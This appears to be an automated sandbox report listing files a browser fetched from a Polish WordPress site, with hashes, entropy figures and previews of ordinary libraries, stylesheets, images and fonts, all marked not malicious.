                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/superfish.js?ver=1.4.8
                                                            Preview:/*. * jQuery Superfish Menu Plugin - v1.7.4. * Copyright (c) 2013 Joel Birch. *. * Dual licensed under the MIT and GPL licenses:. *.http://www.opensource.org/licenses/mit-license.php. *.http://www.gnu.org/licenses/gpl.html. */..;(function ($) {.."use strict";...var methods = (function () {...// private properties and methods go here...var c = {.....bcClass: 'sf-breadcrumb',.....menuClass: 'sf-js-enabled',.....anchorClass: 'sf-with-ul',.....menuArrowClass: 'sf-arrows'....},....ios = (function () {.....var ios = /iPhone|iPad|iPod/i.test(navigator.userAgent);.....if (ios) {......// iOS clicks only bubble as far as body children......$(window).load(function () {.......$('body').children().on('click', $.noop);......});.....}.....return ios;....})(),....wp7 = (function () {.....var style = document.documentElement.style;.....return ('behavior' in style && 'fill' in style && /iemobile/i.test(navigator.userAgent));....})(),....toggleMenuClasses = function ($menu, o) {.....var classes = c.menuC
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):14811
                                                            Entropy (8bit):7.967728999865378
                                                            Encrypted:false
                                                            SSDEEP:384:IHyj3RfScPhe5eCPEYGPTJPNQWxa/lwZVOm52jqMxx2:15scvTPTJF4lwZVL8jnx2
                                                            MD5:AB2298A0C8CBB58726EE6CD8F8BB2385
                                                            SHA1:98C119D0D3D5EC003FAE4F20363153F6C98790B1
                                                            SHA-256:8A9D0537BB6568321820FB04B5655D8FB78F08CD1105192776DFE4D1105D7CFA
                                                            SHA-512:20DAC6B4E1EF6D34D86AB112A546F955D90405FC5B609431B6BB70E940938DC44535BAD9A48F312D871E6A1D2A8CD31947A219D2688E5058170458E25B06A606
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/tesco_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.e..?.5.TZ.".....T.P..."...b/g......q?=..'..S,(.."H5....BH..&[..}fw..d7.Iv....y...y..<...}.yf.$.2..)..D..S.a.]...;7e.R.....T..<..q..T.Z.j..C.5...f...........0....tM.EE.k./.V.....}.(i.6.D..~......_.+...'.0...._.........d.\.eV.t(.*.#......oXm....a...)..[)...G.`{..1....!..Hm..$......-a.r...7.7L..m.....r.2..}...?.,l..@.J....]...VT.....gO.....Q.%.......n..`.(.t1..~.z..0....>....~..X..l..%.9s..3:..F.Fm.....JH....{EE....S..I..i*K.o..by0M.}7..W..1.M&S.....jv.B.M.hZ.W..(..9.H.BI.........AaH|..7.......I..F...aT............%...F.@.5/((.UP..bLF..G..SSlR .bJ..Qm.m.1j....`c2J.b...~KJ..#...d0...>..2.CJKW:F.N......?Bt.H.Ov...uW|..;.}...^mdj:2V.U..rd.Y....4.=_|V.R.[..j.G.Z....j#.C.nx.}....`:.\..I..Q...d...U..KI1(...*..0..]J...h.:...&ES... ....-z..>...['..&`......s|.Zp.)....vr..,,m.:.S..."J8...u..a........".D.....W_=v.5.....{.....i8e-.N'.,Y2...5..j..j..Hr.... ...h......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 220x220, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, height=1152, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=175, yresolution=183, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 14:18:04, width=2048], progressive, precision 8, 772x494, components 3
                                                            Category:dropped
                                                            Size (bytes):514861
                                                            Entropy (8bit):7.979267787344127
                                                            Encrypted:false
                                                            SSDEEP:12288:OdidXz+XhOPa+qGdu3tWje7LYQsafVDYVvUDaOk:q+K7+qGdu9+jDN57
                                                            MD5:E9D0F1C3C8ABD93E12F7702A711CC265
                                                            SHA1:C3C839C2F1B14A0EAD16199FBF56ED105F4B0B7C
                                                            SHA-256:F43D9F3FBC507C0D939B2D0831203216573AD406BF97067E580048038B6CF817
                                                            SHA-512:2F7B46E1303DAFBA6525CEEEF0EA89B49EAB8FCA2886FE91796B26AC40C710C9A6A8BF9C959A5AF801ACB9DE556ED493ABA0204B33C1C124C0A50617062B42A3
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF............).Exif..II*...........................................................................................(...........1...%.......2.......................i...............samsung.SM-N910C...!..'....!..'..Adobe Photoshop Elements 7.0 Windows.2017:09:08 14:18:04...........*...........2..."...........'...................0220........:...........N...........b...........j...........r...........z.......................................................................0100.................................................................................... ...............................2016:12:15 10:27:02.2016:12:15 10:27:02.....d.......d...[...d...............d.......d........................H16LSHA00SM H16LSIG01SA................................................(...................&............&......H.......H.............JFIF.....H.H......Adobe_CM......Adobe.d.......................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):4297
                                                            Entropy (8bit):5.073750091975922
                                                            Encrypted:false
                                                            SSDEEP:48:Lc6mS0XrMFd0158rQoo6SlrqZJTylnRr2krQr1krxmKWgQK/rLaX5z5zrXrXC2MS:LcBJf848inRykskpPN/a93fchMKy1V
                                                            MD5:D74855BB51A6E406FEC6E116CF0497EA
                                                            SHA1:70DD1E22072599F9D99792F205B5560EA62A4573
                                                            SHA-256:BDC06A0AE0926C481FAE2925005DD1001E0D6A13E66741C2864390D42B6DF8AB
                                                            SHA-512:089654DEDDC86EF84707B7E292F9D07860CCD1A2D81B08B56B20D4519B9240CC4585BF6D6E46FBEFD2A5CF335CDA4939E4D3045A64DB319C10C6C72D9DE6EAF0
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6
                                                            Preview:div#fancy_overlay {..position: fixed;..top: 0;..left: 0;..width: 100%;..height: 100%;..display: none;..z-index: 30;.}..div#fancy_loading {..position: absolute;..height: 40px;..width: 40px;..cursor: pointer;..display: none;..overflow: hidden;..background: transparent;..z-index: 100;.}..div#fancy_loading div {..position: absolute;..top: 0;..left: 0;..width: 40px;..height: 480px;..background: transparent url('fancy_progress.png') no-repeat;.}..div#fancy_outer {..position: absolute;. top: 0;. left: 0;. z-index: 90;. padding: 20px 20px 40px 20px;. margin: 0;. background: transparent;. display: none;.}..div#fancy_inner {..position: relative;..width:100%;..height:100%;..background: #FFF;.}..div#fancy_content {..margin: 0;..z-index: 100;..position: absolute;.}..div#fancy_div {..background: #000;..color: #FFF;..height: 100%;..width: 100%;..z-index: 100;.}..img#fancy_img {..position: absolute;..top: 0;..left: 0;..border:0; ..padding: 0; ..margin: 0;..z-index: 100;..width: 10
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):226464
                                                            Entropy (8bit):1.452407433678892
                                                            Encrypted:false
                                                            SSDEEP:768:zkcE/IZriP3OEbLgizWPuOTqWuysMHIudzGdmiw:zkHIZriPhgizWPuhxMNz4Zw
                                                            MD5:7A524708600291EDA1DD11D8AB00D3B6
                                                            SHA1:DDBDABE34EE96DD320F9C5632765BF0E966D22EE
                                                            SHA-256:1DD11D9F2015412B0BCA1DDB892D2DDA575626566307D67E5A946345B34911EC
                                                            SHA-512:29B8827E2E243D8D108584450FA75F2248DCAB28BC0335578EDA70A00E5880EA98747F13C5FCE6BD955228B88CAEB0B700CD604CAD158E5666E54E549794B202
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/02/city_1.mp4:2f8a52234edc61:6
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (15224)
                                                            Category:downloaded
                                                            Size (bytes):18181
                                                            Entropy (8bit):4.765796653390419
                                                            Encrypted:false
                                                            SSDEEP:384:cn50kJuPTb9Uh31//bEP+XgA3S9CleffJmp3:c50KU9Uh31//YWXgA6ffC3
                                                            MD5:116C86C56F8DB0BB63F15CEDA50FDC98
                                                            SHA1:75E308982ECF7CD43644B8B426E6AA1A0B0FBE26
                                                            SHA-256:DEF5DE6254BE138B8B35D680D1FDD8B07827D03B8626DAEBFEEB4157EC330EA7
                                                            SHA-512:7124C3A6D306B5AA53639A722EEB7E5CC2D144F5A698E4086BB49D5554E5E1AFCC28E096B1BF0E8D96B8751DD6D2CFAEB52D6343CECB174A81A2C49726E3369E
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/wp-emoji-release.min.js?ver=5.8
                                                            Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/13.1.0/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return b(d);return b(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,a){return o(d,function(d){var u,f,c=d,e=x(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,n),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,n,r,o,i,s,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a]
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):13710
                                                            Entropy (8bit):7.962381680569804
                                                            Encrypted:false
                                                            SSDEEP:384:Iw0UzpzykAQq3+ZFYef9P76j5QS1j9w1SY:TFyJEZ2eVPej6ARw1SY
                                                            MD5:54D81791EAE6ABBA1CFE5C709D022F3C
                                                            SHA1:6CC0C7D251AAB952B17FAA1E1AE72B99A293872D
                                                            SHA-256:4DF07E0F3A3E8AD7D15938C8BEE91695CD0F30065CD3153E4BC2CBDB520EA057
                                                            SHA-512:428664FE1D38C37B783833C11690539E5197A7CFAEE98E1B437FC9B6471451658D07B2EA86527C2F3978664E006E95ED8B8B33C5D86A8C58E514052BE4804E65
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/leclerc_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...|.e...[..d.I.$..j &............q........go........SD...P...HH....;.M6.&.......v23.....7..NSZ.VH....h..L,.#.S.NY.v.....]PL`m.J(.n.w.7..;w..4(..r.=......,.>..1....v`[......>a(.0!.L>..C.b.Q...M...`.....".[8~......2dS7.<...o...i.xx....o.....gR.Ly.7!..7..[.........|v...t/..>.....x60{Pv.J...+V.;..4.'../.....x'@^....1...k.J...Za|..n.....P`b.....o.Y..........G.X,.9r.4.K....%[.t..;N.P......HOO.J....~.Gee.d..T...L..V..l.<.n_.o.Yb..v`,..J..cPPP...8...l....XP....V...5..'........<.Xy.c..R..*.t}..].EP..+222.RRR".YVT.I+..`.Edff.C...[Aegg[.t....X@n-.VP.:ujS0bq+..m.n....o..........$.rqE...gbL(N..`X.Hl..g.W..bC....l....S3.!..\h..>...O..lP........".L.0...'....=...#Zu.d....Z..e6..tz.p(..Y..q>.0..MT.L(....!.wV.=M.....;F...~1........a.y;.:.....w.6.k.....s.z&(..g........^.............j...1#M.wf.w|47..O.6.+wW$&..........W.a..hm...$._....=..........G..RE.G..B.%..,.Pe.....O:..P.(....j.G;j<Z
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (12987), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):12987
                                                            Entropy (8bit):5.161748864453597
                                                            Encrypted:false
                                                            SSDEEP:384:4v6d5sHteQkJmVUrITdnMrQk2Y18e2pZN5+:6Es8QkJmmrq79YCe2pZN5+
                                                            MD5:6AD9165B167D54947B37F4B9DE75AB39
                                                            SHA1:4C02F66FD8C26141450E310D6786F50F99913DD4
                                                            SHA-256:EEA0B9621509F98BE77C5AF1E9B5C952A675BDA2B27C419876364017069E0C19
                                                            SHA-512:DAE93E3FE93A1E04D65BF1A64DBE7AB4F58938363C9B0D519DDCAA4608C0BEB4DAB995DB8B115E174D8F2B2A539F5DADB0B60D79D96110477CBEF6B172C1AF9C
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2
                                                            Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)n.d(r,o,function(t){return e[t]}.bind(null,o));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=3)}([function(e,t){e.exports=function(e,t,n){return t in e?Object.defineProperty(e,t,{value:n
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32066)
                                                            Category:downloaded
                                                            Size (bytes):109881
                                                            Entropy (8bit):5.381610141069411
                                                            Encrypted:false
                                                            SSDEEP:1536:jV4hHAqu0mcKYXcnNUyHTPLkABMyl9A7/nplFblCPgKDrNUt:jiRVu0lKY666LkABNl9YPb7KNUt
                                                            MD5:D9E831A47787B43DF5203A50806F0668
                                                            SHA1:6F6DE21574F4C096459E0B74DEFB2408ACB6B0C7
                                                            SHA-256:DBEC4A743800F821A24988242551E06237D1EE0AE6B3A8A87E466EF21AFD82A4
                                                            SHA-512:7347E6B7DC216EA9D0A1E552BB588F592BA1979A45D2F787D2366EB876DC7316845C111616DA0AC0C1B5DB1DC0D8EFE47F341E3AE4F00EF5364629A3C04D71C6
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/tweenmax.min.js?ver=1.18.0
                                                            Preview:/*!. * VERSION: 1.18.0. * DATE: 2015-09-05. * UPDATES AND DOCS AT: http://greensock.com. * . * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotationPlugin. *. * @license Copyright (c) 2008-2015, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. **/.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("TweenMax",["core.Animation","core.SimpleTimeline","TweenLite"],function(t,e,i){var s=function(t){var e,i=[],s=t.length;for(e=0;e!==s;i.push(t[e++]));return i},r=function(t,e,i){var s,r,n=t.cycle;for(s in n)r=n[s],t[s]="function"==typeof r?r.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7973)
                                                            Category:dropped
                                                            Size (bytes):20787
                                                            Entropy (8bit):5.301875884707572
                                                            Encrypted:false
                                                            SSDEEP:384:8uMSX9vEqkTVScdV/vWxcHsiW58furhDGXvhHQfww/Xc2S8mFkF50y:iScPy+hkLqkJ
                                                            MD5:49FA677B9CD7DDF221DC06537B35E10F
                                                            SHA1:7485F3F99C3C1A57197F2B099F3F8D68B8609D06
                                                            SHA-256:0CD851E5B33AF0FBB354DF65506DA39807B998E07723F3D08ABA5179FA2ED97E
                                                            SHA-512:40D50C965DB656D352C1E73BF3FF9E82B64422398974D55902B0EAAB213FF255AF9338C33D09A8B148DA37B1A13EF0377DE2B510F6B5C7C42C8F866BA3189A54
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! jQuery UI - v1.12.1 - 2020-09-25.* http://jqueryui.com.* Includes: data.js, disable-selection.js, escape-selector.js, focusable.js, form-reset-mixin.js, form.js, ie.js, jquery-1-7.js, keycode.js, labels.js, plugin.js, position.js, safe-active-element.js, safe-blur.js, scroll-parent.js, tabbable.js, unique-id.js, version.js, widget.js.* Copyright jQuery Foundation and other contributors; Licensed */.!function(t){"function"==typeof define&&define.amd?define(["jquery"],t):t(jQuery)}(function(x){var t,e,n,W,C,o,s,r,l,a,i,h;function E(t,e,i){return[parseFloat(t[0])*(a.test(t[0])?e/100:1),parseFloat(t[1])*(a.test(t[1])?i/100:1)]}function H(t,e){return parseInt(x.css(t,e),10)||0}x.ui=x.ui||{},x.ui.version="1.12.1",./*!. * jQuery UI :data 1.12.1. * http://jqueryui.com. *. * Copyright jQuery Foundation and other contributors. * Released under the MIT license.. * http://jquery.org/license. */.x.extend(x.expr[":"],{data:x.expr.createPseudo?x.expr.createPseudo(function(e){return function(t){r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):14360
                                                            Entropy (8bit):7.969569236946322
                                                            Encrypted:false
                                                            SSDEEP:384:Ip/lXIbHzhJXCoJUEBvQAE0e7IIf7Bp33sOiQhG7:mWo39ZsOigq
                                                            MD5:1D6F8DBA4042E1B8ECF0A7332AE21C96
                                                            SHA1:DD8CCE8E465BFFB26B39DCB0E587F81B465C762B
                                                            SHA-256:B58A4630A1AD308213182CF878509D2AA3889BEDEB9FF50DF85A3DEAB318BCCF
                                                            SHA-512:80863A6DA192838CD226E3F9D99C5ACCB94993BCD19709152F395FD7417E29B0ACDE6DAD822896ADD026B5DE81D9063186F2F4795300146008D2093FEA804AB1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...x.U...TH.-t...H... ....T.V\+.W..u........*v..VDA..(.((%.C......w...n.;a.w....L.d..o.|.=.9.....D..m@m.aV92..aCU...e...&.b.....A.w.O.....s.1...;......&.....5.*A.VQUaf"..M@.V.....G..LV...1.U..o..'.....*..`.Z...a~o..8u4p..@y..|.....*..w.Y..O=O..L......wp..6.........^.,[.4I.^z...v..K.>G....O>C."..V.m..k........p...L>n...>......q.2;.;.aVQ.|DFF..L...[.d.....p.Hee%F..91..A.F.".x....\sM...(.F.X...CfH"X.z.]........ADD...U..[3.,.....*+...0..5::.UBB.f+;.#..0Nsm5.FIc...F..Sq......r.1.....b.h'..8R..`9".jp.X.|yn.>}......I...@...\.R..z...............(.Z.n}H.X%(.....eTDD..-....7..H....f.F@I.Y..L.S..?.<./`...i.....+...7..Y..u.Y...aC6........f............\`.. .2...t<.3N..4....Q....:.......&....1n....x.?..;w..v.O?................70...7on.n]...P.....5*X.2j....:th.m.OPF. .;...<../...{....q....4..P.f.....6..V.*n..P.i.o0.o.e2?q.......%&&.oC.<...A....]:.h...so.Q4(..@..O.8..#[....e.-,.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):25891
                                                            Entropy (8bit):7.983470845089535
                                                            Encrypted:false
                                                            SSDEEP:384:Ij8KuxibkSnCOoa69Mjpbv138OBW57to+XGYgmFQJMwqo9zCoih+/iWc08ZbbJI/:ljYCvw138OBmO1aQ6I1Chh+sZGFZMQ
                                                            MD5:96255458FA04C4E1C67735FD3D940130
                                                            SHA1:3E88CE2CF8EE9188F64C5F942293F215FC428585
                                                            SHA-256:700B3DD6319830572E602131C4CDD681CF3E037D0C2870140DB85E099CF87656
                                                            SHA-512:41F19FAE771B8C594431A24FFFFE8A05493084751D928FF55AD5CD1E396EF7E9DA351B2D113FC1B8A4B4D3A6C7B63D24B324C794FCCAA974CBD61CD9B932A340
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_miles_from_tomorrow.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......9.... .IDATx..w.\.u......UY.P.@.a....w."E..9#;...5..D....h#v....b$..Gn..XI....)z.d{.F.6.B.(T........#.....f7I....QU....w.._.s..B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P.....?Z..F.Z...l...bq.m.)..g~.1M.lYV1.H.knn.N$..OB.O......H..b...>...v%......x.P(.eY..n.....mJ...b.b.H:.>.....D"..B.W.....Z......~9.HD..4---.c>D......(.J....nnn.WJ..`.vn_.\......+.H4e2.eE.#.....(..........D..J.n..._.|.9......%...N.GD.Zezz..0^...zT.QS....'Q.D..[.9.ZWWWS{{....,--1??..{.}....!...%X?)b.W...:22.w...UV.b.........H..!|.+J.~.bU.T~....e....U)..q.FFF.-[..O.h.o.h)........:q...={...X).N.N.:U...=...Q.....`%..;6.}..d,.S..x[..2../.8p.W.QP=...T..g.....>..d.X)~ .X.L&....}NJ.V=...G)V.....}..&.Q..xGd2.|.....K)..#J.~T......7....3..........2.zC..B..+W..QsssB......677'&''.XJi..Q.....A....g...Tg(..}}}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format, TrueType, length 90412, version 1.0
                                                            Category:downloaded
                                                            Size (bytes):90412
                                                            Entropy (8bit):7.995400003544641
                                                            Encrypted:true
                                                            SSDEEP:1536:Vx1QuVD2cALyUabwF3A+3PY27krILOlnRO6kvBdbfDc5RX061lxpo1v:VVVD25LyUakfYckr3lnlkvXrc5RkSx+l
                                                            MD5:C8DDF1E5E5BF3682BC7BEBF30F394148
                                                            SHA1:6D7E6A5FC802B13694D8820FC0138037C0977D2E
                                                            SHA-256:ADBC4F95EB6D7F2738959CF0ECBC374672FCE47E856050A8E9791F457623AC2C
                                                            SHA-512:6D465ACF39B4CDB365BFDC32EA06637A9F14ED1C1508353A7E0627B6B88EFE8ACCA77ACCAD3A4BF3F8EAFEB638B7867EC98EA6BE3338E63AF4067EC3F6C5FA18
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2
                                                            Preview:wOFF......a,......T.........................FFTM...D........j.:.GDEF...`....... ....OS/2.......>...`.6z#cmap.......~...../t.gasp...@............glyf...H..C6.......head..F....2...6....hhea..F........$....hmtx..F.........T(..loca..I...........DLmaxp..P`....... ....name..P........|1...post..R(.......L..<.webf..a$..........W4.........=.......O<0.....Z[.x.c`d``..b...`b`d`dZ.$Y.<...n...x.c`f.a........b.................b......l...|6.F.0#....F...U..x...K.q....Z....*.@W.q......Cc...9./...B.....8H.q.(.".........5..W.B.]:.....<...#.....y.....w..^3.K..n.%...j.B_h.....X<..g.4.QMhJ3.....5]..m..A..H ..r(...jX...8F."....,c9+X.*V..3r...Q?>P..*.hL....e.j].uS.. .|L#.4...2..c..hB.L,fIK[..V..U.~Gu{n.w...s3.............72!.2&..JF..a..A.K....b.m.....5_.%_.9..)..1X............C>......?~y=..B....t^.)................n.............x....T.0..o.................fG@@lQ.....q......"..F.,3f1_b.l:Y$&!f.Mb...qL~....{_Uuu.-:...]..}=..s.=.<.s[9..Dxp..e.r..Ay....V<.U...*r.8..qU..Q..g8.)
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):33950
                                                            Entropy (8bit):7.987703351027374
                                                            Encrypted:false
                                                            SSDEEP:768:cqn0Zz35DqAAUU9QBXmPKy3fIy5OgiANZSA:YZFVhdBpOOS
                                                            MD5:45CDC0C83C78C101CA1A9D6F2E5C449A
                                                            SHA1:76A9C4E883405C39593100DD75282E2E969B3813
                                                            SHA-256:AD677BA0B9F09909999492FFC2EFA136E4E58F3F74C04278EBA9FCDE04CE73BD
                                                            SHA-512:9B13C18A807B1FB47333617674164700CCABC93D116B56020875E0FE2047345BCB35C66CFFC66CAC088DF5FC56656C1A62BFC60DD11D4C394450CAB951B36C58
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..}.`.u..gfg{...I.I...^E..l X...?..g........N.;....SP..r..A....!u7.wg..;.!mCv.......;;.7o>.....$IB$B.j..CL.`qz.VXX(......@..F.v.z..#.0..-M#a'...2r....p'.(.........A.......6.o.q.1cF.M0f.8...O(..o.jpVV.O@.>X..K.6.8.l6....N...O........_^....0..P.h...j.l.'.(.......8.=..4.......3.T".K.o..k.N..(VB...%..../...y.....6.ou..B0..}......(..w.Z.0...1..-.Y.~.Z@.@|.H.....Y...BS[..2.b..,..Y(|.P<:.q..$.....-.9.....m...1>...<..+|.....C5.......#g.K.}.WN....w.&..'....E....{..".k...D0.......}n.F.......Z.......P.....>.aI..f.....J...c..l...D.o.........&.|T94!..*.1..8 8.Vpat...W....n..x<U..Iw...s.Aa..tf...d..k3.3.>X..^..g<....T?>(.e.A(,BAZ.*.nLZp.Pp..q.).K.'...:.q..M4..vX0......L.])`_R....7.+.......0gI...(... .j...2.....q...$...PxR.)$.x.^.._.R..n.a.a...;^..a...W.r...R)..=..d..T~.4+C.EL.:unH.#..E.......P.|,c..ks......;wb..a.`q....[,..n....8........g....8p..`...`$L. ...z}Y.G.......R.H(fY.;)Tsh..3..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:downloaded
                                                            Size (bytes):89521
                                                            Entropy (8bit):5.289973268315515
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1vM:DIh8GgP3hujzwbhd3XvSiDQ47GKq
                                                            MD5:02DD5D04ADD4759122013C5AB4DC5CC2
                                                            SHA1:A45A56E396AC549B4FF39B696CE9E0C16A7612DE
                                                            SHA-256:BD4DE6A3FC0FB68D6F76BA7B93514B96A92E585C295B5351C31AD92A4B0777EA
                                                            SHA-512:04690D9875E98F5AE6BF94F5C71B7A0177B374BC09609A0F58312E1C337348749A40E07FE226737DC248BD8FE2F6A489071258619AFFC7F1DF644E4255159615
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=243, yresolution=251, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2018:01:15 16:59:31], progressive, precision 8, 846x417, components 3
                                                            Category:dropped
                                                            Size (bytes):188690
                                                            Entropy (8bit):7.9480489978542685
                                                            Encrypted:false
                                                            SSDEEP:3072:Jmg2EF8DNGz5wreRztB3r5BUjlTUN3wBEm5xFJ09jHesfIj2aqLoJwyHWK2A:9wsrRztBKANgvB09esfukLUpHD2A
                                                            MD5:349D523506DA28CAB09CE17DE89BEC96
                                                            SHA1:B48A855BCE1CDC9D824A81591755C9E7F6BEB726
                                                            SHA-256:5C469C3769CE75CC1386485EAAE1F5984F458324F10F5FC0D51AEA79DDC3A7D8
